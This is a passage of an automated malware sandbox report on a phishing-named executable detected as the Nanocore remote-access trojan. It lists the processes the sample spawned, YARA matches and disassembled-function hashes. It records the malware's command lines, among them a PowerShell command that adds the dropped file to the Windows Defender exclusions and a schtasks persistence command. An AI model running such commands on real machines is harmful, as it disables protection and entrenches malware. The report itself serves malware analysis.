                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: powershell.exe PID: 2416 Parent PID: 4900

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Chronological Activities

                      Analysis Process: schtasks.exe PID: 3348 Parent PID: 4900

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'
                      Imagebase:0x250000
                      File size:185856 bytes
                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 1844 Parent PID: 2416

                      General

                      Start time:08:13:35
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 6080 Parent PID: 3348

                      General

                      Start time:08:13:36
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Analysis Process: powershell.exe PID: 1848 Parent PID: 4900

                      General

                      Start time:08:13:37
                      Start date:20/07/2021
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
                      Imagebase:0x840000
                      File size:430592 bytes
                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high

                      Chronological Activities

                      Analysis Process: #RFQ ORDER7678432213211.exe PID: 1328 Parent PID: 4900

                      General

                      Start time:08:13:38
                      Start date:20/07/2021
                      Path:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      Imagebase:0xa50000
                      File size:1084928 bytes
                      MD5 hash:2F286CD817B368E8A747E8F0D8F28825
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.494090628.0000000006310000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: NanoCore, Description: unknown, Source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493236087.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493399369.0000000005830000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.492994566.0000000005630000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000012.00000002.493334722.0000000005810000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 1260 Parent PID: 1848

                      General

                      Start time:08:13:40
                      Start date:20/07/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6b2800000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: powershell.exe PID: 6052 Parent PID: 4900 powershell.exeCOMMON

                        Executed Functions

                        Function 034AC490, Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk$p\kk$p\kk
                        • API String ID: 0-3145599026
                        • Opcode ID: d5c9785004168ebfd29994b915915866abd3ffa36da6d2a47adaba5f821cc037
                        • Instruction ID: 5726226310322b549b723107b80e5335b32c9615a16f32992439d72030c00712
                        • Opcode Fuzzy Hash: d5c9785004168ebfd29994b915915866abd3ffa36da6d2a47adaba5f821cc037
                        • Instruction Fuzzy Hash: 12B10074B002159FCB44DF78D594BAEB7F2AF88208F148569E406AF3A4DB34ED45CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AC480, Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk$p\kk$p\kk
                        • API String ID: 0-3145599026
                        • Opcode ID: 540f4ac11dd1e17ebc05bb96f713196f016c8f79125b8b3bb8b8212d7fccb312
                        • Instruction ID: 2baabf991f0e8a0a045991c3366b826cf53050ef368debdaf7722637f3c9a18f
                        • Opcode Fuzzy Hash: 540f4ac11dd1e17ebc05bb96f713196f016c8f79125b8b3bb8b8212d7fccb312
                        • Instruction Fuzzy Hash: D2A13134B002159FCB44EF78D594AAEB7F2AF89208F148469E406EF365DB34ED45CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A6A18, Relevance: 3.0, Strings: 2, Instructions: 514COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: DKl$DKl
                        • API String ID: 0-327652034
                        • Opcode ID: c2c44948f7f6f43e7ae11b9245258ecc392c31a0face560f54a1857b54b3ce8d
                        • Instruction ID: a4ee607bb87d3d04f55ccb061f16e3655b95d34a3afdeb0893d02e37f0b0ff04
                        • Opcode Fuzzy Hash: c2c44948f7f6f43e7ae11b9245258ecc392c31a0face560f54a1857b54b3ce8d
                        • Instruction Fuzzy Hash: 69221734A00705CFCB15EFA4C49496EB7B2FF89315B158869E80AAF765CB35EC46CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A8138, Relevance: 2.8, Strings: 2, Instructions: 275COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: DKl$Xcl
                        • API String ID: 0-2518824167
                        • Opcode ID: cce33e88e3ed1efec9498de30ecddefccf2ace8cd3d7b721bbde26ad2b925f14
                        • Instruction ID: 2e355421e7585786c1d041e29233fc6799a118e555567c623417a597a665c0b5
                        • Opcode Fuzzy Hash: cce33e88e3ed1efec9498de30ecddefccf2ace8cd3d7b721bbde26ad2b925f14
                        • Instruction Fuzzy Hash: 32B18839B00604CFCB15DF69D4948AEBBF2FF8921571585AAD40A9F362DB35EC02CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AEC08, Relevance: 1.6, Strings: 1, Instructions: 355COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk
                        • API String ID: 0-1941218024
                        • Opcode ID: 533f00a5e6c49e709277bbfebcc75447e457bfe782d047d73330c1e222b7adac
                        • Instruction ID: 6eec5c3ce8697d0745581c8a2b433a5dbe4abaf3ddcc6c935e9904d205fbc3d3
                        • Opcode Fuzzy Hash: 533f00a5e6c49e709277bbfebcc75447e457bfe782d047d73330c1e222b7adac
                        • Instruction Fuzzy Hash: 63E10F74F002189FCB54EFA8D850B9EB7B2EF88204F108569E51AAB394DF74AD45CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AEBF9, Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk
                        • API String ID: 0-1941218024
                        • Opcode ID: 60bb10f4e39411c9afdf09b5447a8645400d6d623e2f00e6e906892d09e02941
                        • Instruction ID: 65bb10a9cc9297ab2a48391eac028adc3790d632fb4772bd4b7584cab883f80d
                        • Opcode Fuzzy Hash: 60bb10f4e39411c9afdf09b5447a8645400d6d623e2f00e6e906892d09e02941
                        • Instruction Fuzzy Hash: F1D1FE74E002189FCB54EF68D890A9EB7F2EF88204F118569E50ADB3A5DF34AD45CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AAD70, Relevance: 1.5, Strings: 1, Instructions: 206COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk
                        • API String ID: 0-1941218024
                        • Opcode ID: f942ac42df0c499419aab853ecb9fd12ddc080b0b1737f654eb5fabb2e82d07c
                        • Instruction ID: 2a33c441b8f692e2e6904c0f7930ad5acec4b5f8972adc4b9dd00ac70aaad5f6
                        • Opcode Fuzzy Hash: f942ac42df0c499419aab853ecb9fd12ddc080b0b1737f654eb5fabb2e82d07c
                        • Instruction Fuzzy Hash: 8771A474B042058FC704EBA8D450AAFB7F6AF89214F11456AE50ADF361DB34EC06CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AAA00, Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: C#
                        • API String ID: 0-2634217768
                        • Opcode ID: d64dd67312b4cfeb5a27c0b268e840ff7742b8928cfa638647032768dfb2a0ff
                        • Instruction ID: 46881b3f389b50591a1ea49e5644bb83698a0e8f08c70e12585173bd9ea2c848
                        • Opcode Fuzzy Hash: d64dd67312b4cfeb5a27c0b268e840ff7742b8928cfa638647032768dfb2a0ff
                        • Instruction Fuzzy Hash: 02512934B006458FCB44DF69C59896EB7F6FF88614B1584AAE90ADF362DB30EC01CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AA9F1, Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: C#
                        • API String ID: 0-2634217768
                        • Opcode ID: b46819b79e95dddc694fcdfb1458d20ef3fbddf76fe8b73dad3495365a39f180
                        • Instruction ID: a8f60998230b700eec8e3779cbbec8663404912b945167fe57037975a3ad7c06
                        • Opcode Fuzzy Hash: b46819b79e95dddc694fcdfb1458d20ef3fbddf76fe8b73dad3495365a39f180
                        • Instruction Fuzzy Hash: 5E415D34700A458FC715DF29C5949AEBBF6FF88614B1580AAE90ADF362DB30EC01CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AAF28, Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: p\kk
                        • API String ID: 0-1941218024
                        • Opcode ID: 421e70e69ab3872b092cb19080a5791c5063a7b6537a564fd86f395883d95b64
                        • Instruction ID: 72b288f5024dc89d7654c5dafd2c5e31f0b88b18d13bf0a70967023733e86cc1
                        • Opcode Fuzzy Hash: 421e70e69ab3872b092cb19080a5791c5063a7b6537a564fd86f395883d95b64
                        • Instruction Fuzzy Hash: 8411E3352042015FC705EB54E890AABB7B6EFC2258B05897EE109CF7B5DF34AC0987E2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A5C88, Relevance: .5, Instructions: 491COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e0a02cc27cb3769a16b4369396606a7d761195c84f3489f130c857d9401a990
                        • Instruction ID: 943078aa94abd5c2ab440a52f7516d24f0c946586f85403fc07866958efdff7d
                        • Opcode Fuzzy Hash: 5e0a02cc27cb3769a16b4369396606a7d761195c84f3489f130c857d9401a990
                        • Instruction Fuzzy Hash: F602A374B046048FCB15DB68D894AAEBBF6FF89201F15846AE446EF3A1CB34DC42CB55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A4958, Relevance: .3, Instructions: 313COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 08e8be3dccf6afe99e954fcdf8866c7d167c3da8d9facb67f713d5e4fac5df9d
                        • Instruction ID: d0246f1f4f4b2eb443e75a116c3b87d726b9c365722c80b00b6a831d9d28338d
                        • Opcode Fuzzy Hash: 08e8be3dccf6afe99e954fcdf8866c7d167c3da8d9facb67f713d5e4fac5df9d
                        • Instruction Fuzzy Hash: 50A1D470B04A108BCE0EA72E611897EB6E79FE450A3155447E223DFB69CFB4CE03474A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A494A, Relevance: .3, Instructions: 301COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e2b1e6ab9763d65b8107d3d07e83fe1dd71ddf44371c4b6f23efb33da0fdd86d
                        • Instruction ID: c0bd5acabad26e55fc112f91f7828dd7a84420168bd47e0ef12ac63eda95df19
                        • Opcode Fuzzy Hash: e2b1e6ab9763d65b8107d3d07e83fe1dd71ddf44371c4b6f23efb33da0fdd86d
                        • Instruction Fuzzy Hash: 42A1B370B04A108BCE0AA72E611897EB6F79BE450A3155547E223DFB69CFB4CE03474A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AAFE8, Relevance: .2, Instructions: 246COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a123eda9998e531c7a57d84d16179fc547c7bfd2ee8078be528a0047408b7c2
                        • Instruction ID: e1b5921974720df6e4be47a44a06c8d40ef90e5a43fc5ffb9e12826cddaf7b84
                        • Opcode Fuzzy Hash: 5a123eda9998e531c7a57d84d16179fc547c7bfd2ee8078be528a0047408b7c2
                        • Instruction Fuzzy Hash: 8EA10674A046088FDB14DFA8D494AAEB7F1FF48204F15856AE816EB361DB31EC41CFA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A69F0, Relevance: .2, Instructions: 242COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e65c175f8f534abcd5cfd77adfc64c29eff6bd403992668f6e9b399565f188f2
                        • Instruction ID: 98a13bd0f3a742f5cea659439b4996d0df7506e2b265749f3706c36d1706b9c0
                        • Opcode Fuzzy Hash: e65c175f8f534abcd5cfd77adfc64c29eff6bd403992668f6e9b399565f188f2
                        • Instruction Fuzzy Hash: 31A13774A007058FCB15EF68C484A6EB7F2FF89315B1588AAD80AAF765CB35EC45CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A04A8, Relevance: .2, Instructions: 172COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 298aeceeee623baa6d7985ef36c20fc6a62c297fff0d9b4e7174da1cfeb4acc8
                        • Instruction ID: 9bf9e473d3a10422e2300259cf53fec87c1184c6c6bc6a945b3ac8dba94c8423
                        • Opcode Fuzzy Hash: 298aeceeee623baa6d7985ef36c20fc6a62c297fff0d9b4e7174da1cfeb4acc8
                        • Instruction Fuzzy Hash: 46616074A001089FCB54EF69D958AAEBBB5FF48315F08802AE416EB3A1DB70DC46CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A18C8, Relevance: .2, Instructions: 168COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80a505447293d7adf3f7781409037e8e837ffd570d1bd3b4704e01cd6a514308
                        • Instruction ID: 76551afcdf460aac234b6c61ef5726820701f8c00250c137e8c94ac274277d0b
                        • Opcode Fuzzy Hash: 80a505447293d7adf3f7781409037e8e837ffd570d1bd3b4704e01cd6a514308
                        • Instruction Fuzzy Hash: B4617034A0424D9FCB15EFA4D855BAEBB76FF88304F114069E546AB3E4CF38A845CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AB860, Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c84ecdb139ee171136013faef82fb667e092311afef407809b2abfba0e352d8
                        • Instruction ID: e9b1fa56c84ac2af62e9d3b57d1b4494bcceec47374c80f7e6ed647e068f7731
                        • Opcode Fuzzy Hash: 5c84ecdb139ee171136013faef82fb667e092311afef407809b2abfba0e352d8
                        • Instruction Fuzzy Hash: 73412A30B05A148BC699AB2DB42853EBAEBEFE4601B15405BE063EF355CF74CD028B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A6470, Relevance: .1, Instructions: 142COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7baae683b9021b91677f427b3ecef1252f9736c0ceadd2156fcfc200f1377d8c
                        • Instruction ID: 0702a7f9d17ae5143d96775f4df43f3c701a0c77926e659bf04b7004d3e8e899
                        • Opcode Fuzzy Hash: 7baae683b9021b91677f427b3ecef1252f9736c0ceadd2156fcfc200f1377d8c
                        • Instruction Fuzzy Hash: D441E175700A008FCB24DB6DE484A6FB3A7ABD5204B1E446BE60ACF365CB75EC428759
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034AAD61, Relevance: .1, Instructions: 128COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 179c482f09e0bb640165fff62d24833f033c648afb8f357cb9fa155c9b8aaf88
                        • Instruction ID: 5bbf723b97249b158f83264e0366bb0e7d67f59cee7a5fe84918bde3d54d105a
                        • Opcode Fuzzy Hash: 179c482f09e0bb640165fff62d24833f033c648afb8f357cb9fa155c9b8aaf88
                        • Instruction Fuzzy Hash: D3415D74B046158FCB04DFA8C484AAFB7F5FF88210B1185A9E505AB351DB30EC42CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A0499, Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 69c360be880a8afa52cd776073406450b8c6b62ba3bf464968d5c7fe65e6fd75
                        • Instruction ID: 47c23c95ae3e3f5438ce64c03e3f726fa6de385d87a57c769fc5edbc23f94228
                        • Opcode Fuzzy Hash: 69c360be880a8afa52cd776073406450b8c6b62ba3bf464968d5c7fe65e6fd75
                        • Instruction Fuzzy Hash: 7C414D74A002099FCB54DF69D958AAEBBB5BF44314F09802AE816EB3A1CB74DC46CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A75E0, Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9cbaf7fff46029daa5a08624a87055969b6c428a924870bb1d7dd8a400d42822
                        • Instruction ID: 3677eb91731aab2df58bd004e75b6584f53815579055ee0d0aa5264c4c3da8d8
                        • Opcode Fuzzy Hash: 9cbaf7fff46029daa5a08624a87055969b6c428a924870bb1d7dd8a400d42822
                        • Instruction Fuzzy Hash: 83313479B005155F8F25EBACD4105AEBFBAAFDA12170484ABE109CF760CA30DC42C796
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034ABA80, Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6171adc7ddd892c3d8b098fd11606481f41c8b46d09de2325bc9906dfaf3b773
                        • Instruction ID: 44d6003f25c44a9a5dd3d63d5561619741e288d5a125b271d1460faa1158258f
                        • Opcode Fuzzy Hash: 6171adc7ddd892c3d8b098fd11606481f41c8b46d09de2325bc9906dfaf3b773
                        • Instruction Fuzzy Hash: 2F3150363145149FC705DB6DE884CA9BBA9EF9932172581A7E609CF361CB32EC02CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A7F20, Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fd26392b7bbbcd03f63ebfa98363380ed2dbe2c64bd6c2309fa8152ff62c839d
                        • Instruction ID: afeb0e81e7851615168fc42228a08b40699e09fe520d7108be817ab464ee5ebf
                        • Opcode Fuzzy Hash: fd26392b7bbbcd03f63ebfa98363380ed2dbe2c64bd6c2309fa8152ff62c839d
                        • Instruction Fuzzy Hash: A2316F39300A118FC714EB69E49492EB7E6EFC961531544ABE51ACFB61DF30EC01CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034A3808, Relevance: .1, Instructions: 99COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e530e57b49df93d3216d06d253a01827d9c08cc70acf60753f54e4eab4247c7f
                        • Instruction ID: 3647174d722a12b96e31ab882e8855af4fd53e1fa8d614a2b3971b097c378132
                        • Opcode Fuzzy Hash: e530e57b49df93d3216d06d253a01827d9c08cc70acf60753f54e4eab4247c7f
                        • Instruction Fuzzy Hash: 58417E78B007058FC714EFA8D49596EB7F2FF88200B10886AE916EB365DB70EC45CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034ABB69, Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.422116168.00000000034A0000.00000040.00000001.sdmp, Offset: 034A0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e052c8b86786cc561340e3861b87284432f187ec2297ecc5dfd2bdfd8e02bb1
                        • Instruction ID: c536cc18394d39d0b2c08955ca287266f63d39cbd972f57f13e2b10c0457eaac
                        • Opcode Fuzzy Hash: 7e052c8b86786cc561340e3861b87284432f187ec2297ecc5dfd2bdfd8e02bb1
                        • Instruction Fuzzy Hash: E1319E79700A258FC714DB68D8A4AAE73B2FF89214B1144AAE506CF3B5DF34DC01CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 034ABB78, Relevance: .1, Instructions: 90COMMON
